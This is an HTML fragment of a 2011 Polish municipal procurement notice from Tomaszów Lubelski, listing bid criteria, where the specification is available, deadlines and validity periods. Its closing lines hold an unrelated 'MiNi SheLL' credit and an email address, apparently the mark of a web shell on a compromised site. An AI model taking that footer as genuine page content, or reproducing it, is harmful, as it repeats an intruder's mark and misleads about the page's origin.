<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-lubelski.pl/infpub/przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> a)ze strony internetowej (www.tomaszow-lubelski.pl/infpub/przetargi.htm ) lub 
b) w Urzędzie Miasta w Tomaszowie Lubelskim, przy ul. Lwowskiej 57, pok.29 lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2011 godzina 10:00, miejsce: Ofertę sporządzoną w oparciu o Specyfikację należy składać w Sekretariacie Urzędu Miasta w Tomaszowie Lubelskim, ul. Lwowska 57,  pok. 23.Termin składania ofert upływa dnia 15.06.2011 r. godz. 10:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com